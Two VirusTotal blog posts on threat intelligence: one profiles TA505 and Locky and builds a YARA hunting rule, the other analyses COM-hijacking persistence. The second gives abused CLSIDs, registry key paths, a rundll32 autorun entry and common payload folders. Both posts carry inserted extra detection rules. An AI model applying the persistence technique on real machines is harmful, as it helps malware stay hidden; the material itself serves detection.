VirusTotal Blog, 2024-03-12
<h1 style="text-align: left;">Know your enemies: An approach for CTI teams</h1>
<div class="interval_12"> VirusTotal’s <a href="https://assets.virustotal.com/vt-deep-dive-threat-landscape-module.pdf" target="_blank"><b>Threat Landscape</b></a> can be a valuable source of operational and tactical threat intelligence for CTI teams, for instance helping us find the latest <b>malware trends</b> used by a given Threat Actor and adjust our <b>intelligence-led security posture</b> accordingly. In this post, we will play the role of a CTI analyst working for a Singaporean financial institution.
</div>
<br />
<div class="interval_12"> As a first step, we search for threat actors that have traditionally targeted both the <b>financial industry</b> and <b>Singaporean companies</b>.
</div>
<br />
<div class="central_img width_80 interval_12" style="text-align: center;">
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOYfPOF1sfQMsCFRPMBClNxlkMUuRqDUJu7BHziJtU6HkPOIO30_gk1vvbq8xFAk3xzheI-Qg3nhq4xQx8jGXtxTDIpRbibFtr4UE6S5VTRL2HUno3HTNOiKOiM4ZkciKairpUmBrB8jJPniPIWQHEH-RL08KLcUjFGNrGPOglM3-0wjr1vSySxvxkPHM/s1379/kyep1.png" />
</div>
<br />
<div class="interval_12"><a href="https://attack.mitre.org/groups/G0092/" target="_blank">“<b>TA505</b>”</a> and <a href="https://attack.mitre.org/groups/G0096/" target="_blank">“<b>APT41</b>”</a> both match these requirements. For now, let’s focus on TA505, which seems more active at the moment.
</div>
<br />
<h2 style="text-align: left;">Understanding TA505</h2>
<div class="interval_12">The <a href="https://www.virustotal.com/gui/threat-actor/03c80674-35f8-4fe0-be2b-226ed0fcd69f/summary" target="_blank"><b>Threat Actor</b></a> card provides details on the actor, which seems to target organizations in the financial, healthcare, retail, and hospitality sectors across Europe, the Asia Pacific region, Canada, India and the United States.
</div>
<br />
<div class="central_img width_80 interval_12" style="text-align: center;">
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLPvh_Z021Xb4CKQgwRFRX-0TTY-tTHqhtTUhRm0wjmY2p5WLI7yHpRgu6y5mS7adKxf6L1M4NESJpH1q3NuBeUFzPKenCLYQamRxMKN9FpZ7fO2lhlCr6386YZCCgIohG_v6j9JrWQ_ghO7kgkpETQVbKyR1VLqfdww3nImmbf2NyBAxUS3qBKdjBHRQ/s16000/kyep2.png" />
</div>
<br />
<div class="interval_12">
According to the description, TA505 seems related to <b>Dridex banking trojan</b> and <b>Locky ransomware</b> activity.
</div>
<br />
<div class="interval_12">
In VirusTotal we can find <b>two categories of TTPs</b>:<br />
- The first category contains TTPs directly ingested from <b>MISP</b> and <b>MITRE</b>.<br />
- The second (called Toolkit TTPs) contains TTPs obtained from <b>sandbox analysis of the IOCs</b> related to a particular actor.
</div>
<br />
<div class="interval_12">
In this case, for TA505 we can find the following <b>Toolkit TTPs</b>:
</div>
<br />
<div class="central_img width_80 interval_12" style="text-align: center;">
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsXor4ZlNpvzrA3SWkbEpawRbYIKZElisjfG5-pC4Ywfp_Kx9R8Uw3cZpaafbQ6L0R_bIiYKVA3IsJMudc9VEY3pEOtoJOakEgA-Xag_627pS6uyN1UfdfJmv3lD-0Ka20YbdflEPxkzs1JPQNYsgXdKs85Hogk6ET8NLeL5VOpJC1ZEfG4LaZyqXC8Qg/s16000/kyep3.png" />
</div>
<br />
<div class="interval_12">The <b>T1486</b> technique <b>(‘Data Encrypted for Impact’)</b> seems potentially related to the use of <b>ransomware</b>, such as <b>Locky</b>, by this actor. This seems like a good point for us to retrieve some fresh data and understand this actor’s recent activity. For instance, the following query provides <b>fresh samples</b> from the actor (samples submitted after January 1st, 2024) that use data encryption and are tagged as ransom by AVs:
</div>
<br />
<div class="my-yara-code interval_12" style="text-align: center;"><a href="https://www.virustotal.com/gui/search/attack_technique%253AT1486%2520threat_actor%253ATA505%2520ls%253A2024-01-01%252B%2520engines%253Aransom/files" target="_blank">attack_technique:T1486 threat_actor:TA505 ls:2024-01-01+ engines:ransom</a></div>
<br />
<div class="central_img width_80 interval_12" style="text-align: center;">
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIQeMWoIypq_2ootb1FVClD_5_9S0nlIexg50yzpY3n3LRgO8Ftki0R_y9alhKe4BEApxBErdPmDyTZZzoEhjlydfHGvPOgLbqeLp8mvKVLmsl5C6AY-E2t3UK-D_Jue33gBLtGzg5bEhyo-eKip2G4nGpYLzNlZh43kcS4mHus8m6MuD6_QSiaDpUzMQ/s16000/kyep4.png" />
</div>
<br />
<div class="interval_12">Several of the returned samples belong to the Collection <b>tagged as ‘locky’</b>, which currently contains <b>510 files</b>.
</div>
<br />
<div class="central_img width_80 interval_12" style="text-align: center;">
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMADkBylU3Ua5_WIyPUatBioi5GrWhyQbiGRGXiyKOoJvdIHERuvpquxnCVMjOGXuCPp-JZq-K6i3vxqie5Z6RlfvfYFL9fscnqPjlAzPSHLQmvqfUgWDgg3mGXHfWAqjcyJO-WC0t8WaEEGoFEFv0NpFbs7ycoWeOncv7aWTjNvgkFQDGWRQQcHeIMEU/s16000/kyep5.png" />
</div>
<br />
<div class="interval_12">The <b>Telemetry tab</b> provides information about <b>submissions</b> and <b>lookups</b>, which helps us understand the malware family’s distribution and its timeframes of operation.
</div>
<br />
<div class="central_img width_80 interval_12" style="text-align: center;">
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDWIpq2eU-Fmk0Twg67amSaq_GYrt4iQY8TLkmVcj2Yw8XARxapIqQBybRYmBllJXbkQj27zsiKPwVdXioxlWzajs9m7RxrCY-mmD6XqMp4TI1WCwRHmt6V43QLeXFBS2MfmeU_bSm7GUZbtXdOHsBArdFzSl4OpcvCl00ZR6nXC4UF7peVm9jsZv1sDM/s16000/kyep6.png" />
</div>
<br />
<h2 style="text-align: left;">Tailoring defenses</h2>
<div class="interval_12">In addition, the Collection’s <b>Rules</b> panel provides details on the crowdsourced <b>YARA</b>, <b>Sigma</b> and <b>IDS rules</b> that match files in this collection.
</div>
<br />
<div class="central_img width_80 interval_12" style="text-align: center;">
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2-cDcNE2XuSnFVnC5uC8aTD7SMr7leJvBpMBYG3iFopbx3QZqc15N8c1sSKqEjl_tIwnUSAvzhtuCJ7fJjtnrrGxuFITgUFffSMjqIBU3UF-C0wgJ5nHKGM3S-y9n9Lgsrnt9p0x8qaAlymMNmSANW2gkBrQ5ZRqui3EKobK6AUq6YR8QLY8wnTiFLhg/s16000/kyep7.png" />
</div>
<br />
<div class="interval_12">In this case, the “<b>win_locky_auto</b>” YARA rule matches almost all the files in this collection (505/510). This rule could help enhance detection capabilities for this threat.
</div>
<br />
<div class="interval_12">A Collection’s <b>commonalities</b> are characteristics, behaviors, or technical attributes shared by a set of indicators, which helps identify patterns. Let’s use them to create a new “<b>Livehunt rule</b>” to track this activity in the future. We will use only recent samples, which we can filter in the IOCs tab (“fs:180d+”):
</div>
<br />
<div class="central_img width_80 interval_12" style="text-align: center;">
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjp6zsOoykB_WZIyIsTdIadYqnQkbECnAjwMN0o2blQv3q01Cbo5vMiKYeTtnR-_T1opy5lxAyvkARZBCadq_z_lJQIu__8STHtuCpYHTB11owibRlERVtxznts-A3WGpHevh36Ec1BLxHtG9oJVdxuwYB30kcmdOZ74HnuMeyb0lYr1C2rzIUDJ8o2SI/s16000/kyep8.png" />
</div>
<br />
<div class="interval_12">Based on commonalities results, some <b>useful information</b> to create the livehunt rule may include:</div>
<br />
<div class="interval_12"><u><b>Metadata</b></u>:
<ul>
<li><b>File type</b>: EXE and DLL formats. <br /><span style="font-size: 8pt;">(vt.metadata.file_type == vt.FileType.PE_DLL or vt.metadata.file_type == vt.FileType.PE_EXE)</span></li>
<li><b>File size</b>: Less than 1 MB.<br /><span style="font-size: 8pt;">(vt.metadata.file_size < 1000000)</span></li>
<li><b>Main icon</b>: Custom and specific icon. <br /><span style="font-size: 8pt;">(vt.metadata.main_icon.dhash == "52c244c9a7a3998b")</span></li>
<li><b>Imphash</b>: Hash calculated from the PE import table, which may match other Locky samples.<br /><span style="font-size: 8pt;">(vt.metadata.imphash == "31553623c43827d554ad9e1b7dfa6a5a")</span></li>
</ul>
</div>
<br />
<div class="interval_12"><u><b>Behavior</b></u>:
<ul>
<li><b>Sandbox attack techniques</b>: Detect the T1486 Data Encrypted for Impact technique. <br /><span style="font-size: 8pt;">(for any tec in vt.behaviour.mitre_attack_techniques: (tec.id == "T1486"))</span></li>
<li><b>Command execution</b>: Identification of a possible ransom note and desktop background being set.<br /><span style="font-size: 8pt;">(for any ce in vt.behaviour.command_executions: (ce icontains "\\Desktop\\*.txt" or ce icontains "\\Desktop\\*.bmp"))</span></li>
<li><b>Memory patterns</b>: Specific patterns observed in Locky samples that could be reused. <br /><span style="font-size: 8pt;">(for any mem in vt.behaviour.memory_pattern_urls: (mem icontains "checkupdate" or mem icontains "userinfo.php"))</span></li>
</ul>
</div>
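As an added example (not a rule from the post), the metadata and behavior conditions listed above assembled into one Livehunt rule; the rule name is my choice, and vt.metadata.new_file restricts matches to files that are new to VirusTotal, which is the usual way to keep a Livehunt rule focused on fresh activity:

```yara
import "vt"

// Added example, not the post's own rule: tracks new PE files that share the
// Locky commonalities found in the TA505-related collection.
rule Locky_TA505_commonalities_tracking
{
    meta:
        description = "New PE files sharing the structural and behavioural commonalities of the Locky collection"
        source = "assembled from the commonalities listed in the post; rule name is an assumption"

    condition:
        // only fire on files seen by VirusTotal for the first time
        vt.metadata.new_file
        // metadata commonalities: PE EXE or DLL, under 1 MB
        and (vt.metadata.file_type == vt.FileType.PE_DLL or vt.metadata.file_type == vt.FileType.PE_EXE)
        and vt.metadata.file_size < 1000000
        // structural commonalities: either the shared icon or the shared import hash is enough
        and (
            vt.metadata.main_icon.dhash == "52c244c9a7a3998b"
            or vt.metadata.imphash == "31553623c43827d554ad9e1b7dfa6a5a"
        )
        // behavioural commonalities from sandbox detonation: at least one must match
        and (
            // data encrypted for impact
            (for any tec in vt.behaviour.mitre_attack_techniques : (tec.id == "T1486"))
            // ransom note and desktop background written to the user's Desktop
            or (for any ce in vt.behaviour.command_executions : (
                ce icontains "\\Desktop\\*.txt" or ce icontains "\\Desktop\\*.bmp"
            ))
            // URL fragments observed in memory of Locky samples
            or (for any mem in vt.behaviour.memory_pattern_urls : (
                mem icontains "checkupdate" or mem icontains "userinfo.php"
            ))
        )
}
```

Keeping the metadata conditions strict and the behavioural ones in an OR group is a deliberate trade-off: a new sample that changed its icon but kept its imphash still matches, while one that lost both structural traits is left to the crowdsourced win_locky_auto rule.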
<br />
<div class="interval_12">Remember you can always <b>follow</b> Threat Actors and/or Collections and receive <b>fresh IOCs</b> through the IoC Stream.</div>
<br />
<h2 style="text-align: left;">Wrapping up: </h2>
<div class="interval_12">
Threat Landscape empowers CTI teams with insights for prioritizing threats, understanding threat actors and tracking their operations by pivoting between <b>Threat Actors</b> <=> <b>Collections</b> <=> <b>IOCs</b>. This provides actionable details based on the technical capabilities of the malware used in these campaigns, including a set of TTPs based on sandbox detonation that we can use both for hunting and monitoring. Collections also provide “<b>Commonalities</b>” across different indicators, including which crowdsourced rules best detect them. This helps us quickly create effective monitoring and hunting strategies for malware families and threat actors, as well as effective protections adjusted to recent campaigns and malicious activity.</div>
<br />
<div class="interval_12">
If you have any <b>suggestions</b> or want to <b>share feedback</b> please feel free to reach out <a href="https://www.virustotal.com/gui/contact-us/other" target="_blank">here</a>.
</div>
<br />
<div class="interval_12">
Happy Hunting!
</div>
Raimundo Alcázar

VirusTotal Blog, 2024-03-07
<h1 style="text-align: left;">COM Objects Hijacking</h1>
<div class="interval_12">The COM Hijacking <a href="https://attack.mitre.org/techniques/T1546/015/" target="_blank">technique</a> is often used by threat actors and various malware families to achieve both persistence and privilege escalation on target systems. It relies on manipulating the <a href="https://learn.microsoft.com/en-us/windows/win32/com/the-component-object-model" target="_blank">Component Object Model</a> (COM), the core Windows architecture that enables communication between software components, by adding a new value to a specific registry key related to the COM object itself.</div>
<div class="interval_12">We studied the usage of this technique by different malware samples to pinpoint the most exploited COM objects in 2023.
</div>
<h1 style="text-align: left;">Abused COM Objects </h1>
<div class="interval_12">We identified the COM objects most abused by samples exhibiting MITRE’s T1546.015 technique during sandbox execution. In addition to the most abused ones, we will also highlight other abused COM objects that we found interesting.
</div>
<div class="interval_12">The chart below shows the distribution of how many samples abused different COM objects for persistence:
</div>
<div class="central_img width_90 interval_12" style="text-align: center;"><img src="https://lh7-us.googleusercontent.com/h9F_1wEQn6e2aSnJXjER-y0oCTFnHMIuIlAPGbaXS7K1yDPWttnbG1eDp5wz8jWx6PEihyuhwPcLMdNA_JbgF6jRUybVK2FQTDOZFIWs3rkUSN4q6GTdrq-1mJb450-CKWKooEi1nfXMw5e-Vnhso_fPeNoka9TkBw1x5gKFxPdTNmCBqMkBRFnSZQRnciY" width="800" /></div>
<div class="interval_12">You can find the most used COM / CLSIDs listed in the Appendix.
</div>
<h2 style="text-align: left;">Berbew</h2>
<div class="interval_12">One of the main malware families we have observed abusing COM for persistence is Padodor/Berbew. This Trojan primarily focuses on stealing credentials and exfiltrating them to remote hosts controlled by attackers. The main COM objects abused by this family are as follows:
</div>
<ul>
<li>{79ECA078-17FF-726B-E811-213280E5C831}</li>
<li>{79FEACFF-FFCE-815E-A900-316290B5B738}</li>
<li>{79FAA099-1BAE-816E-D711-115290CEE717}</li>
</ul>
<div class="interval_12">The corresponding registry entries point to the malicious DLL. However, multiple samples of this family use a second registry key for persistence, which points to one of the CLSIDs described above, as in the following <a href="https://www.virustotal.com/gui/file/3e2cac1e6bc16e2763be8b30e0f7f68b0c4feee17cf66f48c684dd0c6da6ebc1/behavior" target="_blank">example</a>:
</div>
<div class="central_img width_90 interval_12" style="text-align: center;"><img src="https://lh7-us.googleusercontent.com/HOCWTX4YofORhFsq73bFupGrAYiKazOlk6-PFnfosNb2GGx5lMbCYa5cM9QWyKSEjvXPAReIPoV8d09uNZ2KHihlrb0Rojd1hRtadkT-zDluMTMKVzsD0U0lzAtzEn8VhW0wUaG3ZfHBAbP53ES1mJAJWIJg93MwvfxVmSBGRQsQTPX8vZnKE1OUmX1s-5I" width="800" /></div>
<div class="interval_12">In this case, the registry key <mark class="my-yara-code"><mark class="red">…CLSID\{79ECA078-17FF-726B-E811-213280E5C831}\InProcServer32\(Default)</mark></mark> points to the malicious DLL <mark class="my-yara-code"><mark class="red">C:\Windows\SysWow64\Iimgdcia.dll</mark></mark>. A second registry entry, <mark class="my-yara-code"><mark class="red">…Wow6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger</mark></mark>, points to the previous CLSID <mark class="my-yara-code"><mark class="red">{79ECA078-17FF-726B-E811-213280E5C831}</mark></mark>, which in turn loads the malicious DLL.</div>
<div class="interval_12">The <mark class="my-yara-code"><mark class="red">ShellServiceObjectDelayLoad</mark></mark> registry key, combined with the <mark class="my-yara-code"><mark class="red">Web Event Logger</mark></mark> subkey reused here by Berbew, has legitimately been used to initiate the loading of the genuine <mark class="my-yara-code"><mark class="red">webcheck.dll</mark></mark>. This DLL was tasked with monitoring websites within the Internet Explorer application.</div>
<div class="interval_12">The CLSID previously used by the <mark class="my-yara-code"><mark class="red">WebCheck</mark></mark> registry key was <mark class="my-yara-code"><mark class="red">{E6FB5E20-DE35-11CF-9C87-00AA005127ED}</mark></mark>. However, in certain instances today the CLSID <mark class="my-yara-code"><mark class="red">{08165EA0-E946-11CF-9C87-00AA005127ED}</mark></mark> is used. Both are responsible for loading the <mark class="my-yara-code"><mark class="red">webcheck.dll</mark></mark> DLL and both are abused by malware samples.</div>
<h2 style="text-align: left;">RATs</h2>
<div class="interval_12">The CLSID <mark class="my-yara-code"><mark class="red">{89565275-A714-4a43-912E-978B935EDCCC}</mark></mark> seems to be extensively used by various RATs. This CLSID has primarily been associated with families like <a href="https://www.virustotal.com/gui/file/80f209630f179f8d8ebbd28d36efb41f10b2c6188b6bafc29e6f980eb4ce199d" target="_blank">RemcosRAT</a> and <a href="https://www.virustotal.com/gui/file/659ad130d6ecb0cd79ae244f88193b9d94dd132965592228a25f743529f12c37" target="_blank">AsyncRAT</a> in our observations. However, we've also encountered instances where <a href="https://www.virustotal.com/gui/file/13f55eff78adb823ecff46c68bcf35d69ce9a803d0b673a34fbd9f9fc3ba0c2c" target="_blank">BitRAT</a> samples have used it. Researchers at <a href="https://blog.talosintelligence.com/new-sugargh0st-rat/" target="_blank">Cisco Talos</a> found this CLSID activity associated with the SugarGh0st RAT malware.</div>
<div class="interval_12">In the majority of cases, the DLL used for persistence with this CLSID is <a href="https://www.virustotal.com/gui/file/4ef3a6703abc6b2b8e2cac3031c1e5b86fe8b377fde92737349ee52bd2604379" target="_blank">dynwrapx.dll</a>. This DLL was found in the wild in a <a href="https://www.virustotal.com/gui/url/85a07bd9400dbd9b07755212a96abbb2deda48b43d8a2bacf588bd7f239a8a0e" target="_blank">GitHub repository</a> that is currently unavailable; however, the DLL originates from a project named <a href="https://dynwrapx.script-coding.com/dwx/pages/dynwrapx.php?lang=en" target="_blank">DynamicWrapperX</a> (first seen in VirusTotal in 2010). It executes shellcode to inject the RAT into a process.
</div>
<div class="interval_12">A similar case is CLSID <mark class="my-yara-code"><mark class="red">{26037A0E-7CBD-4FFF-9C63-56F2D0770214}</mark></mark>. The associated DLL for persistence is <a href="https://www.virustotal.com/gui/file/3b6ddc32b800a18b21a819e842cbfdd57cb065fd92cc69545e0ef29b97cfd389/details" target="_blank">dbggame.dll</a>. First uploaded to VirusTotal in 2012, this DLL is deployed by various types of <a href="https://www.virustotal.com/gui/file/ce4ca81f0c627690e0f1916ae39b08ae523631172f6e8387373b02830810525b/" target="_blank">malware</a>, including ransomware such as <a href="https://www.virustotal.com/gui/collection/malpedia_win_xiaoba" target="_blank">XiaoBa</a>.</div>
<h3 style="text-align: left;">RATs with vulnerabilities</h3>
<div class="interval_12">To finish with RATs that use this technique: from late December 2023 to February 2024, there were various incidents linked to the <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21412" target="_blank">CVE-2024-21412</a> vulnerability uncovered by the Trend Micro Zero Day Initiative team (<a href="https://www.zerodayinitiative.com/" target="_blank">ZDI</a>). During these events, active campaigns were distributing the <a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.darkme" target="_blank">DarkMe</a> RAT. Throughout the infection process, a primary goal was to evade Microsoft Defender SmartScreen and deliver the DarkMe malware to victims.
</div>
<div class="interval_12">The Trend Micro analysis highlights that the DarkMe RAT sample uses the CLSID <mark class="my-yara-code"><mark class="red">{74A94F46-4FC5-4426-857B-FCE9D9286279}</mark></mark> to carry out the final loading of the RAT. However, we have also seen other CLSIDs used for persistence, including <mark class="my-yara-code"><mark class="red">{D4D4D7B7-1774-4FE5-ABA8-4CC0B99452B4}</mark></mark> in this <a href="https://www.virustotal.com/gui/file/5c85a0fe230d351b35da364c797cc95557f5dcceec034eb648e1805237c7203b" target="_blank">sample</a>.
</div>
<div class="interval_12">Furthermore, to guarantee the DLL's execution, the malware creates a value under an Autorun key. Its purpose is to activate the CLSID through <mark class="my-yara-code"><mark class="red">rundll32.exe</mark></mark> with the <mark class="my-yara-code"><mark class="red">/sta</mark></mark> parameter, which loads a COM object, in this case the malicious COM object created previously.
</div>
<div class="my-yara-code interval_12">
<pre><b>EventID:</b>13
<b>EventType:</b>SetValue
<b>Details:</b>%windir%\SysWOW64\rundll32.exe /sta {D4D4D7B7-1774-4FE5-ABA8-4CC0B99452B4} "USB_Module"
<b>TargetObject:</b>HKU\S-1-5-21-575823232-3065301323-1442773979-1000\Software\Microsoft\Windows\CurrentVersion\Run\RunDllModule</pre>
</div>
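As an added hunting example (not from the post), a Livehunt rule over sandbox registry writes that covers the persistence patterns described so far: a CLSID InProcServer32 value pointing at a DLL, a ShellServiceObjectDelayLoad entry that resolves to a CLSID as in Berbew, a Run value that launches rundll32 /sta as in DarkMe, and the specific CLSIDs associated with the RAT and Berbew families. The rule name and the roaming-profile path heuristic in the first branch are my assumptions, and vt.metadata.new_file restricts the rule to files new to VirusTotal:

```yara
import "vt"

// Added example, not the post's own rule: hunts new samples whose sandbox run
// writes registry values in the COM-hijacking shapes described in the post.
rule COM_hijack_persistence_hunting
{
    meta:
        description = "Sandbox registry writes matching COM hijacking persistence patterns"
        source = "assembled from the patterns in the post; rule name and AppData heuristic are assumptions"

    condition:
        // only files seen by VirusTotal for the first time
        vt.metadata.new_file
        and (
            // (1) a CLSID InProcServer32 default value pointing at a DLL under the
            //     user's roaming profile (heuristic: the most common drop location)
            (for any reg in vt.behaviour.registry_keys_set : (
                reg.key icontains "\\CLSID\\{"
                and reg.key icontains "\\InProcServer32"
                and reg.value icontains "\\AppData\\Roaming\\"
                and reg.value iendswith ".dll"
            ))
            // (2) a ShellServiceObjectDelayLoad entry whose value is a bare CLSID,
            //     the Berbew "Web Event Logger" pattern
            or (for any reg in vt.behaviour.registry_keys_set : (
                reg.key icontains "\\ShellServiceObjectDelayLoad\\"
                and reg.value startswith "{"
                and reg.value endswith "}"
            ))
            // (3) a Run value that activates a CLSID via rundll32 /sta,
            //     the DarkMe autorun pattern
            or (for any reg in vt.behaviour.registry_keys_set : (
                reg.key icontains "\\CurrentVersion\\Run\\"
                and reg.value icontains "rundll32"
                and reg.value icontains "/sta"
                and reg.value icontains "{"
            ))
            // (4) the CLSIDs the post ties to RemcosRAT/AsyncRAT/BitRAT, dbggame.dll
            //     and Berbew, wherever they are written
            or (for any reg in vt.behaviour.registry_keys_set : (
                reg.key icontains "{89565275-A714-4a43-912E-978B935EDCCC}"
                or reg.key icontains "{26037A0E-7CBD-4FFF-9C63-56F2D0770214}"
                or reg.key icontains "{79ECA078-17FF-726B-E811-213280E5C831}"
            ))
        )
}
```

Branch (1) is the noisiest, since legitimate per-user installers also register COM servers under the roaming profile, so expect to review its matches against the DLL's signer and first-seen date before treating them as hits.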
<h2 style="text-align: left;">Why use one when you can use many?</h2>
<div class="interval_12">Some samples (like <a href="https://www.virustotal.com/gui/file/0759a7a20f33e1a2e70988b91c3abc713ddb130846dcef122ae1bd7179ad39d1" target="_blank">this Sality one</a>) use multiple CLSIDs: </div>
<ul>
<li>{EBEB87A6-E151-4054-AB45-A6E094C5334B}</li>
<li>{57477331-126E-4FC8-B430-1C6143484AA9}</li>
<li>{241D7F03-9232-4024-8373-149860BE27C0}</li>
<li>{C07DB6A3-34FC-4084-BE2E-76BB9203B049}</li>
</ul>
<div class="interval_12">The sample drops two different DLLs during execution; three of the registry keys point to one of <a href="https://www.virustotal.com/gui/file/259eaf1ddc9bf610d11a22413853b3d4386fc5a8412c6e602c74eb43f1a32d46/details" target="_blank">them</a> and the remaining one to <a href="https://www.virustotal.com/gui/file/5fae639451537023dac63435b819b8b8c7ef96dc2fcf768c5f43172e2bb8ab65" target="_blank">the other</a>. The sample also turns off the Windows firewall and UAC to carry out additional actions while infecting the system.
</div>
<div class="central_img width_90 interval_12" style="text-align: center;"><img src="https://lh7-us.googleusercontent.com/CgMyQFCyp8QdRzn7oDZEjeNzyRRKAGdauSqFbB8dbgPigeeiSmfM5fBd6fbKbw9yC7jduHNgsNZsWfuzQa6qfOJehvBFm2jtNPikgGzs4tfKdTMepE57mQmmawpP09rQpGoj_jE-v4pLeEOdN3e5JaGC_12FohlKpf2dFVauablqF4ThWHBqqBiJV8w389s" width="800" /></div>
<div class="interval_12">The <a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.allaple" target="_blank">Allaple</a> worm family registers multiple COM objects pointing to the malicious DLL during execution, as in this <a href="https://www.virustotal.com/gui/file/280466dd91b55a0543ec46cbe67c65882a6cbc3511222825c8fe00ff431435ff/" target="_blank">example</a>:
</div>
<div class="central_img width_90 interval_12" style="text-align: center;"><img src="https://lh7-us.googleusercontent.com/srr4NcbbgMs00yPDx3sji6jBvO4cZYTFrmiUTpr-RE98-A4nV0qPIAzGfP4Iu6onRyiLJknQ21ryWH2y0YQbU5vICwzVsc7DPpWF8UFpnNzyfKZ2UYGfTgvarleHGOENsAuC1-cKR16vsrxG3M7IfVmfJ4NjrxInM8HTDGLkVDQWCODlUcgOVOAtDT2yatU" width="800" /></div>
<h2 style="text-align: left;">Adware</h2>
<div class="interval_12">Citrio, an adware web browser developed by Catalina Group, uses in <a href="https://www.virustotal.com/gui/search/behavior_registry%253A%2522%255C%255CCatalinaGroup%255C%255CUpdate%255C%255C%2520%2522%2520p%253A5%252B/files" target="_blank">its more recent versions</a> a COM object with CLSID <mark class="my-yara-code"><mark class="red">{F4CBF20B-F634-4095-B64A-2EBCDD9E560E}</mark></mark> for persistence. It drops several harmful DLLs; one masquerades as Google Update (<mark class="my-yara-code"><mark class="red">goopdate.dll</mark></mark>), also observed as psuser.dll, and is capable of creating services on the system in addition to using a COM object for persistence.
<div class="central_img width_90 interval_12" style="text-align: center;"><img src="https://lh7-us.googleusercontent.com/vmzA_B8lAkuJCNYSz0IWihUOUXtD0tCy2jsGuebDJESCgQCsCe_MMWjCyMTBCAHKSEAiGweELdegS0IuSqPlBg8I6qT8cbLx-8feKUgosuYUMDqrxjJk-RKEPlkxY9KlklQW5BiT_RDfPPWZkcVJRnM-miOK3lEo5zPHinbCb7liR96DKOWiyC4w6PzFovk" width="800" /></div>
</div>
<h1 style="text-align: left;">Common folders used to store the payloads</h1>
<div class="interval_12">
Most of the malicious DLLs we have seen so far are stored in the <mark class="my-yara-code"><mark class="red">C:\Users\&lt;user&gt;\AppData\Roaming\</mark></mark> directory. It is also common to create subfolders within this directory; the most frequently found include:
</div>
<ul>
<li>\qmacro</li>
<li>\mymacro</li>
<li>\MacroCommerce</li>
<li>\Plugin</li>
<li>\Microsoft</li>
</ul>
<div class="interval_12">Beyond \AppData\Roaming, the following folders are also frequently used to hide the malicious DLLs:
</div>
<ul style="margin-bottom: 0; margin-top: 0; padding-inline-start: 48px;">
<li aria-level="1" dir="ltr"
style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;">
<p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-wrap: wrap; vertical-align: baseline;">The </span><span
style="color: #188038; font-family: &quot;Roboto Mono&quot;, monospace; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-wrap: wrap; vertical-align: baseline;"><mark class="my-yara-code"><mark class="red">C:\Windows\SysWow64</mark></mark></span><span
style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-wrap: wrap; vertical-align: baseline;"> folder exists on 64-bit versions of Windows and holds the legitimate 32-bit system files and libraries. It is often used to conceal malicious DLLs: one more DLL among hundreds of legitimate ones draws little attention, which complicates detection. Note, however, that writing to it requires administrative privileges, so a payload found here means the malware was already running elevated.</span></p>
</li>
<li aria-level="1" dir="ltr"
style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;">
<p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-wrap: wrap; vertical-align: baseline;">The </span><span
style="color: #188038; font-family: &quot;Roboto Mono&quot;, monospace; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-wrap: wrap; vertical-align: baseline;"><mark class="my-yara-code"><mark class="red">C:\Program Files (x86)</mark></mark></span><span
style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-wrap: wrap; vertical-align: baseline;"> folder is another legitimate directory used to store COM hijacking payloads. As with \AppData\Roaming, we have observed the malicious DLLs placed under subfolders named after well-known software, such as “\Google”, “\Mozilla Firefox”, “\Microsoft”, “\Common Files” or “\Internet Download Manager”, where an extra DLL blends in with a real installation. Like SysWow64, this folder is not writable by a standard user, so a payload here also implies the malware ran with elevated privileges.</span></p>
</li>
<li aria-level="1" dir="ltr"
style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;">
<p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="color: #188038; font-family: &quot;Roboto Mono&quot;, monospace; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-wrap: wrap; vertical-align: baseline;"><mark class="my-yara-code"><mark class="red">C:\Users\&lt;user&gt;\AppData\Local</mark></mark></span><span
style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-wrap: wrap; vertical-align: baseline;"> is another folder used for storing these payloads, typically under the “\Temp”, “\Microsoft” and “\Google” subfolders. Like \AppData\Roaming, it is writable without elevation.</span></p>
</li>
</ul>
